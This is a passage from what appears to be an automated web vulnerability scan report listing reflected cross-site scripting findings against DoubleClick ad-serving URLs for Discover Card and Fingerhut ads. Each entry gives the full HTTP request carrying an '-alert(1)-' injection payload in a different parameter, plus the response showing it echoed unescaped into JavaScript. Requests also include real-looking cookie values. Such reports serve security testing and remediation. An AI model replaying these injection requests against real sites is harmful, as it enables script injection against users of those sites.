var dcswf = 'http://s0.2mdn.net/1796512/OpenRoad_300x250.swf';
var d
...[SNIP]...

1.80. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [_s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discovercard/poem5

Issue detail

The value of the _s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26a71'-alert(1)-'e380434b323 was submitted in the _s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discovercard/poem5;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=1168326a71'-alert(1)-'e380434b323&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=;u=17185423;ord=2154696? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQpWWed-BK01HHs7eg4EgdFTD8LDgDube5mEivx7k515EHKU6lL91ksZykl4fi8KS04_YfVYRbCxNEbNd-UvEhQr-xl3ZRzj4Qz0B4JF-D7TrgCnxd-cBxTmnMAAAA%3D%26dst%3Dhttps%253A%252F%252Fwww.discovercard.com%252F&_wp=AAABMNQHXBqdFcsUGr9klqNS4zQXZf-gdR5gRw&_nv=1&_CDbg=17184852&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFQ4BgEAAAAAWDgGAQAAAAB3kAAAAAAAAI86BgEAAAAAvjoGAQAAAAC_OgYBAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3Y2ZiYjZlMi0zZmRkLTRhMGEtOTNjOS04NjhkYzFiMDA2MTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC45CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4194
Date: Tue, 28 Jun 2011 02:17:42 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
x250.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=1168326a71'-alert(1)-'e380434b323&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=http%3a%2f%2fdiscovercard.com/credit-cards/cardbuilder/index.html%3Fiq_id%3Do1112';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://
...[SNIP]...

1.81. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discovercard/poem5

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 290e8'-alert(1)-'d38eb4805ab was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discovercard/poem5;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=290e8'-alert(1)-'d38eb4805ab HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQpWWed-BK01HHs7eg4EgdFTD8LDgDube5mEivx7k515EHKU6lL91ksZykl4fi8KS04_YfVYRbCxNEbNd-UvEhQr-xl3ZRzj4Qz0B4JF-D7TrgCnxd-cBxTmnMAAAA%3D%26dst%3Dhttps%253A%252F%252Fwww.discovercard.com%252F&_wp=AAABMNQHXBqdFcsUGr9klqNS4zQXZf-gdR5gRw&_nv=1&_CDbg=17184852&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFQ4BgEAAAAAWDgGAQAAAAB3kAAAAAAAAI86BgEAAAAAvjoGAQAAAAC_OgYBAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3Y2ZiYjZlMi0zZmRkLTRhMGEtOTNjOS04NjhkYzFiMDA2MTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC45CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4205
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 02:19:18 GMT
Expires: Tue, 28 Jun 2011 02:19:18 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=290e8'-alert(1)-'d38eb4805abhttps://www.discovercard.com/cardmembersvcs/acqs/app/display?pageFileId=more15&sc=KBC6';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://s0.2mdn.net/1796512/pickAcard300x250v2.swf';
var
...[SNIP]...

1.82. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discovercard/poem5

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35db2'-alert(1)-'3a61e2f6500 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discovercard/poem5;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b0061135db2'-alert(1)-'3a61e2f6500&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=;u=17185423;ord=2154696? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQpWWed-BK01HHs7eg4EgdFTD8LDgDube5mEivx7k515EHKU6lL91ksZykl4fi8KS04_YfVYRbCxNEbNd-UvEhQr-xl3ZRzj4Qz0B4JF-D7TrgCnxd-cBxTmnMAAAA%3D%26dst%3Dhttps%253A%252F%252Fwww.discovercard.com%252F&_wp=AAABMNQHXBqdFcsUGr9klqNS4zQXZf-gdR5gRw&_nv=1&_CDbg=17184852&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFQ4BgEAAAAAWDgGAQAAAAB3kAAAAAAAAI86BgEAAAAAvjoGAQAAAAC_OgYBAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3Y2ZiYjZlMi0zZmRkLTRhMGEtOTNjOS04NjhkYzFiMDA2MTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC45CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4194
Date: Tue, 28 Jun 2011 02:15:50 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
ext = '';
var dcgif = 'http://s0.2mdn.net/1796512/CB300x250.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b0061135db2'-alert(1)-'3a61e2f6500&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=http%3a%2f%2fdiscovercard.com/credit-cards/cardbuilder/index.html%3Fiq_id%3Do1112';
var targ
...[SNIP]...

1.83. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [_a parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/poem/swimlanes

Issue detail

The value of the _a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3037d'-alert(1)-'8e6906997c7 was submitted in the _a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/poem/swimlanes;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=218682303037d'-alert(1)-'8e6906997c7&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=;u=xp_34|21868673;ord=6086992? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvQ0CMQwG0I9f5XRr0CFLztmJnQFoaanPJHR0jMRybIHu9W_GDsDFtXMID7LFmLSXlZxVqb3E4tmqeMkJ-_t0-804bCN0jRhVSIYbWS-Neq6DXKXnpTRhHwlHwK4JJ-D7TjgDnwf-mGSPqXMAAAA%3D%26dst%3Dhttp%253A%252F%252Ffingerhut.com&_wp=AAABMNQ5F1dq3aPnx6MOnPuk7OqDrBxrTfmeiQ&_nv=1&_CDbg=21868230&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAMauTQEAAAAAU61NAQAAAADBPQAAAAAAAIGwTQEAAAAAt65NAQAAAAC4rk0BAAAAACND7EEAAAAAAADoPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA4NGQwYjMwZS03MjcwLTRkNWEtODA0NC05ZjM3YmM5NjM4NTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAOlFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:11:33 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
6/300x250_ps1.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=218682303037d'-alert(1)-'8e6906997c7&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize%
...[SNIP]...

1.84. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [_c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/poem/swimlanes

Issue detail

The value of the _c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d821'-alert(1)-'7814853e8be was submitted in the _c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/poem/swimlanes;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=158092d821'-alert(1)-'7814853e8be&_pm=97956&_pn=21868673&redirect=;u=xp_34|21868673;ord=6086992? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvQ0CMQwG0I9f5XRr0CFLztmJnQFoaanPJHR0jMRybIHu9W_GDsDFtXMID7LFmLSXlZxVqb3E4tmqeMkJ-_t0-804bCN0jRhVSIYbWS-Neq6DXKXnpTRhHwlHwK4JJ-D7TjgDnwf-mGSPqXMAAAA%3D%26dst%3Dhttp%253A%252F%252Ffingerhut.com&_wp=AAABMNQ5F1dq3aPnx6MOnPuk7OqDrBxrTfmeiQ&_nv=1&_CDbg=21868230&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAMauTQEAAAAAU61NAQAAAADBPQAAAAAAAIGwTQEAAAAAt65NAQAAAAC4rk0BAAAAACND7EEAAAAAAADoPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA4NGQwYjMwZS03MjcwLTRkNWEtODA0NC05ZjM3YmM5NjM4NTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAOlFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:12:36 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
tivewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=158092d821'-alert(1)-'7814853e8be&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize%3D300x250%26CTTestGrp%3Dflash%
...[SNIP]...

1.85. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [_d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/poem/swimlanes

Issue detail

The value of the _d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32bc3'-alert(1)-'30e27806cb7 was submitted in the _d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/poem/swimlanes;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=2186785932bc3'-alert(1)-'30e27806cb7&_c=15809&_pm=97956&_pn=21868673&redirect=;u=xp_34|21868673;ord=6086992? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvQ0CMQwG0I9f5XRr0CFLztmJnQFoaanPJHR0jMRybIHu9W_GDsDFtXMID7LFmLSXlZxVqb3E4tmqeMkJ-_t0-804bCN0jRhVSIYbWS-Neq6DXKXnpTRhHwlHwK4JJ-D7TjgDnwf-mGSPqXMAAAA%3D%26dst%3Dhttp%253A%252F%252Ffingerhut.com&_wp=AAABMNQ5F1dq3aPnx6MOnPuk7OqDrBxrTfmeiQ&_nv=1&_CDbg=21868230&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAMauTQEAAAAAU61NAQAAAADBPQAAAAAAAIGwTQEAAAAAt65NAQAAAAC4rk0BAAAAACND7EEAAAAAAADoPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA4NGQwYjMwZS03MjcwLTRkNWEtODA0NC05ZjM3YmM5NjM4NTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAOlFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:12:15 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
ar dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=2186785932bc3'-alert(1)-'30e27806cb7&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize%3D300x250%26CTTestGrp
...[SNIP]...

1.86. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [_eo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/poem/swimlanes

Issue detail

The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13a0b'-alert(1)-'b4090b2e029 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/poem/swimlanes;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=9795613a0b'-alert(1)-'b4090b2e029&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=;u=xp_34|21868673;ord=6086992? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvQ0CMQwG0I9f5XRr0CFLztmJnQFoaanPJHR0jMRybIHu9W_GDsDFtXMID7LFmLSXlZxVqb3E4tmqeMkJ-_t0-804bCN0jRhVSIYbWS-Neq6DXKXnpTRhHwlHwK4JJ-D7TjgDnwf-mGSPqXMAAAA%3D%26dst%3Dhttp%253A%252F%252Ffingerhut.com&_wp=AAABMNQ5F1dq3aPnx6MOnPuk7OqDrBxrTfmeiQ&_nv=1&_CDbg=21868230&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAMauTQEAAAAAU61NAQAAAADBPQAAAAAAAIGwTQEAAAAAt65NAQAAAAC4rk0BAAAAACND7EEAAAAAAADoPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA4NGQwYjMwZS03MjcwLTRkNWEtODA0NC05ZjM3YmM5NjM4NTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAOlFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:10:51 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
